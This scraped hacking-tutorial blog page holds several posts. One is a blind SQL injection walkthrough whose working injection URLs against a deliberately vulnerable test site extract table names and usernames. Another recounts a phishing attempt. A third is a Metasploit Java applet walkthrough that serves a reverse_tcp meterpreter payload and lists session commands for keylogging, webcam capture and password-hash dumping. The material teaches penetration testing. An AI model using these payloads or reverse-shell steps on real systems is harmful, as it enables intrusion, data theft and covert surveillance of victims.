Blind SQL Injection

Only proceed if you know SQL Injection basics. If not, read these posts first-

1. SQL Injection Basics (theoretical yet important)
2. Manual SQL Injection (using web browser only)
3. Automated SQL Injection using SQLMap (Kali Linux)  (this one is optional)

What we know so far

If you've read the above three tutorials, you know the basic theory of what SQL Injection is, you know how to carry it out using you web browser on a vulnerable website, and you know how to use SQLMap to automate some of the process.

Now, for revision's sake, what we did in the Manual SQL injection tutorial was-

1. Found a potentially vulnerable website (http://testphp.vulnweb.com)
2. Used the asterisk  ( ' ) to verify vulnerability.
3. Found out the number of rows and columns by making some small changes to the URL (which eventually changes the query that is executed on the server)
4. We then obtained names of tables, their columns, and finally extracted data.

However, it is worth noting that the website was intentionally left vulnerable, and most often the flaws in security aren't this obvious. In our case, the website was willingly responding to our queries with errors. This may not always be the case. As long as we can see the errors, we know we're going in the right direction. Errors tend to give us clues. However, some websites may choose to suppress the error messages. This make SQLi harder. This is known as Blind SQL Injection.

What I didn't tell you

I explained in subtle details what each and every step did. However, I did not explain the motive behind each step. (I gave a rough idea in the Sql injection basics post)

The purpose of the asterisk ( ' ) was to find out how the server handles bad inputs. If it has some mechanisms for sanitizing or escaping these dangerous characters, then we would not see any error in output.

Now this is not intended to be a theoretical post. While the SQL Injections basics post was for total beginners, I am linking a SQL Injection post appropriate for anyone who has carried out the classical SQL Injection attack, which we did in the manual SQL injection attack post, and is ready for blink SQL Injection.

Intermediate level sql injection (Wikipedia had great theory on SQLi, so I cropped the important bits for a hacker's point of view and posted it here)

SQL Injection example with explanation (This post isn't very useful for actual hacking, but explains concepts very well with examples. PS: This is an external link. Since their content is not licensed under creative commons, I couldn't simply crop the important part and put it here, so you have to go to their website)

PS: The posts in the beginning of the tutorial are mandatory, these are optional reads. You may choose to skip these and come back later and read whenever you're free. Now we'll get started.

Finding a suitable website 

We now have to find a website which is vulnerable to SQL Injection, but does not show error messages. Basically, a site which can be hacked into but not using classical attacks. The site will not give any obvious responses to our attacks. This is why it is called a blind SQL Injection. It is hard to know whether we're doing it right or not.

Now there's a problem. Blind SQLi is quite time consuming. One first tried the classical attacks, and if they fail, then only they proceed to blind SQLi. I can't find a website which wouldn't mind being attacked, and exposed in public. So I'll have to use the same old testphp.vulnweb.com website. The URL we're going to attack is vulnerable to classical SQLi. However, we're going to assume that it's not, and attack it without using any of the methods we used in the previous SQLi tutorial. That being said, blind SQLi involves a lot of guessing, and the fact that I can use union based sql injection (classical injection that we did already) to find out table names, etc. makes it much easier for me to write the tutorial. Now we'll begin-

Finding out if target is vulnerable

Our target in this attack is -

http://testphp.vulnweb.com/listproducts.php?cat=2

Now the first take is to find out whether the target is vulnerable or not. Ideally, one would add an asterisk to find whether the target is vulnerable to classical injection. If not, then only should he/she proceed to blind SQLi. In our case, the target is indeed vulnerable to classical injection (since we see an error when we append an asterisk ' to the url). But for the sake of learning, we will ignore this fact and proceed with Blind SQLi. We will from now assume that there will be no errors whatsoever to aid our attack.

Now we have a problem

If the site won't return any errors, how can we find out if it's vulnerable? The solution is a pretty elegant one. This attack is based on boolean algebra. It's pretty intuitive and surprisingly simple.

The basic concept is as simple as the following :-
(true and true ) = true

When we specify 1=2

(true and false) = false
Also,
1=1 is true
1=2 is false

Now look at the statements-

http://testphp.vulnweb.com/listproducts.php?cat=2 and 1=1

http://testphp.vulnweb.com/listproducts.php?cat=2 and 1=2

When we specify 1=1

Now the basic condition for determining whether the website is vulnerable to injection is to find out whether it executes the code we send it, or just ignores it. Earlier we used asterisk and the error suggested that our code was indeed processed. This time errors are not shown, so we use logic. In the first URL, the condition evaluates as true, and page is displayed as usual. Basically we're asking the table to show the page if it's 'category is 2' and '1 is the same as 1'. Both the conditions are fulfilled and page is shown. In the second case, 'category is 2' but '1 is not the same as 2', so the conditions simplify to false, and nothing is shown. What can we conclude? We conclude that the code we add to the URL is processed by the DBMS software (usually MySQL).

Finding other details

Now the process of finding out other details would be identical. We now know that if we type a true statement after and, then the page is displayed, else it's not. We can simply keep guessing stuff till we are right, in which case the condition is true, and page is displayed.

Finding version

Now it is very impractical to expect that we'll be easily able to guess the complete version, the pic will show you why (it's from the manual SQLi tutorial)

However, we don't need to know the exact version. Finding out whether it's MySQL version 4 or 5 is sufficient. For that, we can extract a substring from the version, which in this case, is simply the first character of the version. This can be done using substr(@@version,1,1). @@version returns the whole 5.1.6.9........ thing but 1,1 extracts the first character. We can then equate it with 4 or 5 to find out which version the website is using.
PS: I put this screenshot here to explain why we used substring, we didn't use the fact that we know the version of SQL already in any way. Even if you have no clue about the version (which is what is going to happen in real life scenario), you can find out the version by looking at the output of the following URLs. You can read more about Substring clause here.

http://testphp.vulnweb.com/listproducts.php?cat=2 and substring(@@version,1,1)=4

http://testphp.vulnweb.com/listproducts.php?cat=2 and substring(@@version,1,1)=5 

As you might have guessed, the version is 5 since it did not return a blank page. I hope you've started to see the pattern now.

Finding tables, columns and records

We will now have to guess the table names. The idea is to start with some common ones, and you'll most probably get a few tables. Most databases have a table for users, admin, login, employees,  etc. Now I'll demonstrate a few failures and successes and then we'll proceed. There is another alternate in which we can go character by character. There is a third method where we can use ASCII codes too.

Problem : Since the website does not display output, how do we find out the table names?
Solution : We can do what we've been doing so far, ask the website if table name = X , where X is our guess at table name. We will keep repeating until the condition returns true, i.e., the exists a table with the name that we guessed.

Problem : This is just a concept, how do we put it to action? How do we ask the database to return true if we guess the right table name? Can't be as simple as 1=1....
Solution :  We will use the select query. select 1 from X is going to be our query. If there is a table called X, then output will be one. Now we can use this output to generate a condition. (select 1 from X) = 1. If X table exists, then output will be 1. Since 1=1, condition will be true. If X does not exist, condition will be false.

Problem : What if we can't guess the table name?
Solution : We have 2 more alternatives. First is to use substr, as we did while finding version, to find out the table name character by character. Basically, we will ask the table if first character of table name is a. If not, we'll try b, c, d, etc. After that we'll proceed to second character. This way, we are guaranteed to find out the table name. (I hope you are getting a good idea why it's called blind SQLi)

Alternate Solution : We can use ASCII values to speed up the above solution. Basically, we can't directly compare characters like number. 6 is greater than 5, but b is not greater than a. Characters can't be compared like that. However, their ASCII forms can, since each alphabet corresponds to a number in ASCII. We can use this fact to ask the table if the first letter of the table name is more than P or less than it. This way, if the table says it's more, we don't have to check the alphabets before P, and Vice Versa. [This is just the concept, I'll demonstrate how it's to be done].

Now, for finding table name, I'll stick to simple guessing. The remaining 2 concepts will be demonstrated while finding column name and data value respectively.

Limit Clause : It must be noted that select query returns all the results from a given table, not just the first. For example, if a table has 500 records, and you ask the table for records where first table is 'a', it will return not one, but all the records with first letter 'a'. This is not what we want. To avoid this, we use limit clause.
Here is a short summary, read the complete section on Limit clause here.

SELECT * FROM tbl LIMIT offset, count

Let’s see what the offset and count mean in the LIMIT clause:

• The offset specifies the offset of the first row to return. The offset of the first row is 0, not 1.
• The count specifies maximum number of rows to return.

I've covered all the concepts, now I hope you can read the commands and figure out what they mean.

Table name

Now we'll try to guess table name

http://testphp.vulnweb.com/listproducts.php?cat=1 and (SELECT 1 from admin)=1

The error message will not be displayed in real blind SQLi. We will see a blank output, like we did earlier.

http://testphp.vulnweb.com/listproducts.php?cat=1 and (SELECT 1 from users)=1 

The page loads fine. This means there is indeed a table named users.

Now, if you are trying this attack on some other site, then you might not be able to guess the name if it isn't as obvious as users. So I recommend you keep reading and try again once you know how to guess one letter at a time (for column name) and how to use ASCII (for obtaining data).
PS: Here limit is not required since we guessed the whole table name at once and not character by character.

Column Name

1. Guessing the whole name

Now, there are 2 ways to get column name. The first way is to guess the complete column name, as we did for table name. 

http://testphp.vulnweb.com/listproducts.php?cat=2 and (SELECT substring(concat(1,username),1,1) from users limit 0,1)=1

http://testphp.vulnweb.com/listproducts.php?cat=2 and (SELECT substring(concat(1,uname),1,1) from users limit 0,1)=1 

The page displays normally for uname, so we know that a column called uname exists. For practice, you can also replace uname with pass,cc,address,email,name,phone,cart1. All these columns also exist in the table.

2. Guessing character by character using equality (=)

The second way is to go character by character. There are 2 ways to do this too. One is to guess the character directly, second is to find the range in which the character lies, and then guess it. I'll show both. This method requires information_schema, i.e. it will work for MySQL 5 series but not 4.
Here I have directly used 117. You may (and in reality will have to) try all possible ascii codes (65 to 122 for A to z)

http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),1,1))= 117

 PS: I tried to see if MySQL automatically converts the character to their ASCII value, and found out that it does indeed. So one may skim the query a bit and finally it will be like. So basically, contrary to what I said earlier, b is indeed bigger than a. Here is the same code with u instead of 117

http://testphp.vulnweb.com/listproducts.php?cat=2%20and%20substring((select%20concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273+limit%200,1),1,1)='u' 

165 is ASCII code for u. We know the column name is uname, so the page should display fine, which it does. You can try values other than 85 and see what happens. Also, 7573657273 is hex code for users (0x indicates hex). Remember, you can do the same for tables by making a few changes. Firstly replaced the bold column in above code with table. A few more changes are necessary too. Here's what the final code looks like :-

3. Guessing character using > or < followed by =

It's almost the same as we did before

http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),1,1))> 100

We now know it's >  100 (100 is 'd'), since the page displayed properly

http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),1,1))> 120

But it is less than 120 ('x'), since page doesn't display well.

 http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),1,1))> 110

Greater than 110 ('n')

 http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),1,1))> 115

Greater than 115 ('s'). Now only 4 possibilities remain, 116, 117, 118, 119, 120 (it is greater than 116 but not greater than 120). We can now try all 5 one by one. I have also highlighted the ascii part in above queries. You can remove the bold text and replace the numbers with characters in single quotes ('a', 'b', etc., also provided in bold below the code)
Finally you'll get success at-

http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),1,1))= 117

However, we only know the first letter of the column name. To find the second letter, replace the red text from 1 to 2. The code becomes-

http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),2,1))= 117

It will not display properly since the second character in uname is n. (ascii 110)

http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((select concat(column_name) from information_schema.columns where table_name=0x7573657273+limit 0,1),2,1))= 110

You can use the > < = method here too. Everything other than 2 will be the same.

Extracting data

Now while what you did so far wasn't very swift either, what you're going to do now is going to be terribly slow. You have to guess the data as well. Each and everything needs to be guessed. 

http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((SELECT concat(uname) from uname limit 0,1),1,1))>64

 http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((SELECT concat(uname) from uname limit 0,1),1,1))>100

http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((SELECT concat(uname) from uname limit 0,1),1,1))>120

Page doesn't display properly for 120 (x)

http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((SELECT concat(uname) from uname limit 0,1),1,1))>120

 http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((SELECT concat(uname) from uname limit 0,1),1,1))>115

http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((SELECT concat(uname) from uname limit 0,1),1,1))=116

So the first letter is 't'. For second character (without ascii this time)

http://testphp.vulnweb.com/listproducts.php?cat=2 and substring((SELECT concat(uname) from users limit 0,1),2,1)>'a' 

http://testphp.vulnweb.com/listproducts.php?cat=2 and substring((SELECT concat(uname) from users limit 0,1),2,1)>'f'  

It lies between 'b' and 'f'

http://testphp.vulnweb.com/listproducts.php?cat=2 and substring((SELECT concat(uname) from users limit 0,1),2,1) = 'b'

 Keep trying

http://testphp.vulnweb.com/listproducts.php?cat=2 and substring((SELECT concat(uname) from users limit 0,1),2,1) = 'e'

Second character is 'e'. You may proceed to do so until you find the complete uname. You can ensure that a character was the last in the word by using the following command.

http://testphp.vulnweb.com/listproducts.php?cat=2 and ascii(substring((SELECT concat(uname) from uname limit 0,1),1,1))>0

 If there is any other character left, >0 will always return true.

This was all there is to blind SQL Injection. In the next post I'll introduce you to some tools which do the task for you. To be honest, no one will call you a noob if you use scripts/ tools to automate blind SQLi. It is a really time consuming process and it is not required to waste so much time when you can write a script to do all the guesswork for you.

Read full post »

Real Life Phishing Scenario : Zero Day google bug

A reader on my blog tried to hack my account

Now all this time I've been teaching people how to hack Wireless networks, Windows machines, Websites and Social Networking accounts. All this we did in Kali Linux. For once, I'm moving away from the operating system and narrating a real life incidence of how someone almost got my Email account and password, and could have possibly infected me with a RAT (remote administration tool). He didn't really mean to hack my account, but was rather interested in making a point. So this is how it happened.

How it started

Everyday, I check my blogger dashboard to see if there are any new comments on my blog. Today morning, I saw an anonymous comment (most of the comments are anonymous so that didn't alarm me) saying that the person needed my help with something but would only contact me via mail. I couldn't give him my personal mail address so I decided to use my website's mail instead, and sent him a message. This was his reply

Looked fair enough. Out of curiosity I clicked the link and it took me to a google drive login page. Everything looked pretty convincing, and I could have easily entered my credentials into the login form, if it were not for the slightly suspicious URL. Also, it was https and chrome verified the digital certificates to be that of google. Faking this can be assumed to be next to be impossible. However, I still was cautious, considering that I run a hacking blog and it's not unlikely that a person visiting here might be good, maybe million times better than me.

What I did

So, I decided, I cannot just dismiss the page as phishing as such without trying. So I entered the email:abcd@gmail.com and password:lookslikephishing and pressed sign in. Now if it were a real page, it would have said incorrect password, but this page had no mechanism for verifying the form data, it actually just kept logging everything (i.e. it recorded whatever someone entered in the form) and would simply download the PDF no matter what we entered in the form. So, after entering the bogus login data, the PDF download started. It completed successfully and I ran the PDF. The content looked genuine and then I realized, well, what if this was a 2 fold attack, first phishing, followed by infection. He could have used a FUD remote administration tool which my antivirus wouldn't be able to detect. I have Windows Defender on my Windows 8 machine, but with proper crypting , anti-viruses can be evaded. So after this, I went to white hat section of hackforums and asked for help (everyone needs help at some time or the other, and I suck at forensics and related stuff) . An expert analyzed my computer thoroughly via teamviewer, and the file was clean indeed. Meanwhile, the following mails had been sent to me.

Mails Recieved

He sent me some mails

He knew I found out the phishing page thing

He said he wants me to spread public awareness regarding this kind of phishing

I replied to him saying that I'm finding out and cleaning the malware he sent me (if any). He replied and said he didn't send any malware or anything.

Finally

 I contacted him via FB. He turned out to be a fellow Indian and was even younger than me (I'm 17 he is 16). By this time I had finished my investigation, and the White hat expert from Hackforums didn't find anything either. I finally concluded that either there is no malware, or he's just too good. Latter is quite unlikely since he was not able to dig up my personal email address on his own. Believe me that's really easy to do. After having a conversation with him and doing some research on this HTTPS phishing page, I realized that it is done using a bug in Google drive, which has been discussed on The Hacker News. I will see if I can replicate a HTTPS phishing website using this bug, and post a tutorial on how to do it. The sole intent of this post is to make people aware that Phishing is a real threat, and to encourage Google to fix this bug soon. Either ways, they will surely patch this bug after I write the tutorial on creating a Phishing page using Google Drive, as Google won't want it's user's accounts to be compromised by any random kid with  a laptop who ended up on this website. Already they have applied a patch which makes carrying this out difficult and during the earlier days of this vulnerability, the URL was short and not suspicious at all, but now it's very long (see the screenshots). Update : Google is probably not going to do anything about the issue as it is not a bug and I'm not gonna take the risk of writing anything which will usher upon me the wrath of Google (as I use blogger for hosting and blogger is owned by google). Google Drive, just like Dropbox allows hosting simple HTML sites like this phishing one. This can be abused, since some people will not know that this is a malicious document uploaded by someone and not a legit Google Drive login page, but it still is not a bug. 

Hacker's message on FB

After I told the hacker on Facebook about this post even he acknowledged that everything about this attack is perfect but the URL which earlier used to start with google drive now has a long suspicious prefix. The vulnerability has been half patched and google will possibly patch the remaining thing soon.

Read full post »

Java signed applet Hack Windows 8 Java vulnerability

Purpose of this tutorial

In this tutorial we will look at how difficult it can be to hack modern operating systems. While you won't be getting the kind of results you were expecting, you will learn a lot here. The exploit will not work at first go, it will not work in the second go, it will eventually work, but we would have modified too many settings in the target OS to call it success. We will be using a pretty mainstream exploit here, the java signed applet exploit.
(Just in case you're new here. You need to have Kali Linux installed, as well as have some basic info about metasploit. Here is the collection of all tutorials. Read first few or maybe all. I write new posts assuming you've read the previous ones)

• HACKING WINDOWS XP
 
• POST-EXPLOITATION OF WINDOWS XP
 
• CRASHING WINDOWS 7
 
• ARMITAGE : FAST AND EASY HACKING GUI
 
• WINDOWS XP : HOLLYWOOD STYLE HACK

Hack any Windows Version

In the previous tutorials we have hacked Windows XP and tested a few Payloads and its features. In this tutorial, we will use a Java exploit to hack any Windows version. Now there are some things that you need to know-

1. There are no 'type something on console and press enter' exploits for modern Operating Systems. They invest enough in security to patch any such vulnerabilities. 
2. The modern operating systems have exploits where the user has to do something like click on a link, install some program, and in our case, allow java plugin to be used.
3. The Operating systems are quite secure, however the applications installed by the users almost always have some bugs which can be exploited, and then by privilege escalation methods, you can get a administrator shell. Jave is widely used, and is, unfortunately, quite secure (but we will still use a  Java exploit here)
4. If you have the latest OS and latest version of Java installed, then they already know how to deal with these kind of attacks and it won't work. We will use Windows 8 and Java 7 build 60 (I upgraded it today), and our exploit will not work. We will then see how to make it work. We will learn a lot of new things. Please follow along only if you have curiosity for knowledge, not just desire to hack.

Java Signed Applet Exploit (browser based exploit)

Some official words here, to help with your digestion-

This exploit dynamically creates a .jar file via the Msf::Exploit::Java mixin, then signs the it. The resultin
g signed applet is presented to the victim via a web page with an applet tag. The victim's JVM will pop a dialog asking if they trust the signed applet. On older versions the dialog will display the value of CERTCN in the "Publisher" line. Newer JVMs display "UNKNOWN" when the signature is not trusted (i.e., it's not signed by a trusted CA). The SigningCert option allows you to provide a trusted code signing cert, the values in which will override CERTCN. If SigningCert is not given, a randomly generated self-signed cert will be used. Either way, once the user clicks "run", the applet executes with full user permissions.

Follow these steps

Commands to execute in bold and red and instruction is green.

root@kali:~# service postgresql start[ ok ] Starting PostgreSQL 9.1 database server: main.
root@kali:~# service metasploit start[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
root@kali:~# msfconsole _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\

Using notepad to track pentests? Have Metasploit Pro report on hosts,
services, sessions and evidence -- type 'go_pro' to launch it now.
       =[ metasploit v4.6.0-dev [core:4.6 api:1.0]
+ -- --=[ 1060 exploits - 659 auxiliary - 178 post
+ -- --=[ 275 payloads - 28 encoders - 8 nops
msf > use exploit/multi/browser/java_signed_applet (Java signed applet exploit)    msf  exploit(java_signed_applet) > show options
Module options (exploit/multi/browser/java_signed_applet):
   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   APPLETNAME      SiteLoader       yes       The main applet's class name.
   CERTCN          SiteLoader       yes       The CN= value for the certificate. Cannot contain ',' or '/'
   SRVHOST         0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion      SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   SigningCert                      no        Path to a signing certificate in PEM or PKCS12 (.pfx) format
   SigningKey                       no        Path to a signing key in PEM format
   SigningKeyPass                   no        Password for signing key (required if SigningCert is a .pfx)
   URIPATH                          no        The URI to use for this exploit (default is random)

Exploit target:
   Id  Name
   --  ----
   1   Windows x86 (Native Payload)

msf  exploit(java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp (meterpreter payload)PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(java_signed_applet) > show options
Module options (exploit/multi/browser/java_signed_applet):
   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   APPLETNAME      SiteLoader       yes       The main applet's class name.
   CERTCN          SiteLoader       yes       The CN= value for the certificate. Cannot contain ',' or '/'
   SRVHOST         0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion      SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   SigningCert                      no        Path to a signing certificate in PEM or PKCS12 (.pfx) format
   SigningKey                       no        Path to a signing key in PEM format
   SigningKeyPass                   no        Password for signing key (required if SigningCert is a .pfx)
   URIPATH                          no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST IP needed here   yes       The listen address   LPORT     4444             yes       The listen port

Exploit target:
   Id  Name
   --  ----
   1   Windows x86 (Native Payload)

msf  exploit(java_signed_applet) > set LHOST 192.168.154.134 (type ifconfig to find your Kali IP) LHOST => 192.168.154.134
msf  exploit(java_signed_applet) > exploit
[*] Exploit running as background job.
msf  exploit(java_signed_applet) >
[*] Started reverse handler on 192.168.154.134:4444
[*] Using URL: http://0.0.0.0:8080/ybfxLEoT
[*]  Local IP: http://192.168.154.134:8080/ybfxLEoT (copy this and paste it into the browser of computer you want to hack)[*] Server started.
[*] 192.168.154.1    java_signed_applet - Handling request
[*] 192.168.154.1    java_signed_applet - Handling request
[*] 192.168.154.1    java_signed_applet - Handling request
msf  exploit(java_signed_applet) >

On our Windows 8 machine

If you haven't installed Java then this is what you'll see.

If you have installed Java then this is what you'll see.

Now after you click run this time, you might end up seeing a dialog which blocked access to java plugin even after we allowed it.

If you are using an older version of Java, you might have gained access already, unless your antivirus detected the payload, which is basically a trojan (if you succeed here, a session will be created in metasploit, but it will be in background. See the end of tutorial to find out how to use that session and then come back here to see the scenario in case of Windows 8, there are things to learn) But it my case, now it's time to realize that we've taken a head on collision with a really secure operating system and the latest version of Java. Now, as I said, this will not work, but you can still give it your best shot.

Why won't it work

Java Sandbox

In technical terms : The java-sandbox allows you to securely execute untrusted code (for example, user generated scripts in scripting languages such as groovy or rhino) from within your application. It allows you to specify resources and classes that may be used by the code, thus, separating the execution from the application's execution environment. It allows to wrap execution environments in threads or even execute them remotely on different jvms.(sourceforge)

In less technical terms:In April, Oracle instituted a number of changes starting with Java 7u21. The new update introduced prompts warning users that an unsigned applet could potentially harm the user’s computer. This came months after Oracle changed Java’s default security settings from medium to high, essentially preventing unsigned applets from executing automatically, requiring instead a user to allow the applet to proceed. Developers must now sign their applets with a certificate from a trusted Certificate Authority. (threatpost)

In English : New versions of Java have an added feature known as Java sandbox. Whenever a java applet is loaded on a browser, it will firstly require user's permission to execute. After the user has given permission, the applet will load inside a sandbox (which is a runtime environment seperated from rest of the computer, like a cage, and the java applet is harmless as long as it is inside). That doesn't solve their problem though, as sandbox stops the Java applet to do much, thereby destroying the whole purpose, even for the genuine developers. So, Java restricts the unsigned applets from exercising much of their functionality, and only the signed applets can do anything. So, hats off to Oracle, for proving that even client side vulnerabilities are not that easy. And sorry to disappoint you guys, but I had to tell you how secure the modern operating systems are. Nevertheless, going to Java control panel, and security tab, will lead you to the conclusion that the Java security level is high by default. And even more mind boggling is the fact that the security levels are - medium, high, very high. Guess the days of 'low' security are gone. However, medium is just what we are looking for.

Sandbox is enabled in high level. 

Sandbox is disabled in medium level. That will solve our purpose here.

Now we opened our java applet again and this time a really dangerous looking security warning dialog came up. Nevertheless, we clicked on "I accept" and then run.

As if this wasn't enough. Windows had to interfere. I could almost hear Windows Defender saying, Java is good, but Microsoft still trusts it's own antivirus for security. Our exploit failed yet again. This time it was the antivirus.

You might have guessed, disable the antivirus.

Now, finally, I refreshed the URL, accepted the warning and allowed the applet to run. I got a new session on Metasploit. The sweet smell of success was highly diluted by the fact that we really rigged the game in our favour. In a real life scenario, you can't expect the AV to be disabled and the security settings set to anything other than the default value.

Use the following commands to switch to the created sessions

msf  exploit(java_signed_applet) > sessions

Active sessions

===============

  Id  Type                   Information     Connection

  --  ----                   -----------     ----------

  1   meterpreter x86/win32  Home\Me @ HOME  192.168.154.134:4444 -> 192.168.154.1:49682 (192.168.154.1)

msf  exploit(java_signed_applet) > sessions -h

Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

    -K        Terminate all sessions

    -c <opt>  Run a command on the session given with -i, or all

    -d <opt>  Detach an interactive session

    -h        Help banner

    -i <opt>  Interact with the supplied session ID

    -k <opt>  Terminate session

    -l        List all active sessions

    -q        Quiet mode

    -r        Reset the ring buffer for the session given with -i, or all

    -s <opt>  Run a script on the session given with -i, or all

    -u <opt>  Upgrade a win32 shell to a meterpreter session

    -v        List verbose fields

msf  exploit(java_signed_applet) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > 

From here, all the meterpreter functionality is available. Here is a list which can be obtained by typing help on meterpretor.

meterpreter > help

Core Commands
=============
    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    migrate                   Migrate the server to another process
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands
============================
    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================
    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================
    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================
    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components

Stdapi: Webcam Commands
=======================
    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam

Priv: Elevate Commands
======================
    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================
    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands
========================
    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

Conclusion

If you've followed along so far, you might be feeling disappointed. While the feeling is natural, it is quite unnecessary. A better way to look at it is the first step in real world pentesting. All this while we were dealing with non-existent scenarios. Old unpatched grandma's Windows XP machines. These don't exist in the real world. In reality we have to deal with strong defenses, limited rights, antiviruses, firewalls, etc. Soon you'll be writing your own exploits (okay not that soon), and evading firewalls and antiviruses (what we did here is not called evasion, you can't simply turn off antivirus protection like that as you don't have access to the computer). In the next few tutorials we'll see how to get around all the things we did and shouldn't have done (disabling AV and reducing Java protection level). There are things that can't be avoided (the target has to go to a URL containing the applet and allow it to run), but we will try to make things as real world as possible. We will also move to some non-traditional exploits, as their AV detection rate is much less. We will look into encryption and anti-virus evasion in detail. Lot of things need to be done. Just remember, you are in hand to hand combat with one of the most secure systems you'll come across, and it's not gonna be easy.

Read full post »

Hack Facebook Account : Stuff You Should Know

Hack Facebook?

Okay, so you got lured into the idea of hacking a Facebook account? I won't ask why. Everyone has their reasons. If you came here to learn how to hack a Facebook account, feel free to leave, because the title read - Hack Facebook Account : Stuff You Should Know - and not - How to hack a facebook account (well actually don't leave, I have something for you later in this tutorial, something on actually hacking Facebook) .That being said, there are a lot of real hacking tutorials around the website you might want to read. However, if you are here on a pure curiosity basis, then read on, and you will be a smarter person by the end of this post than you were when you began reading it.

Why not to think about hacking facebook

Search google images for facebook hack and you already
 see so many misleading programs. I mean
just enter user ID and they'll provide
 you with username and password.
It's surprising how many people actually expect it to work.

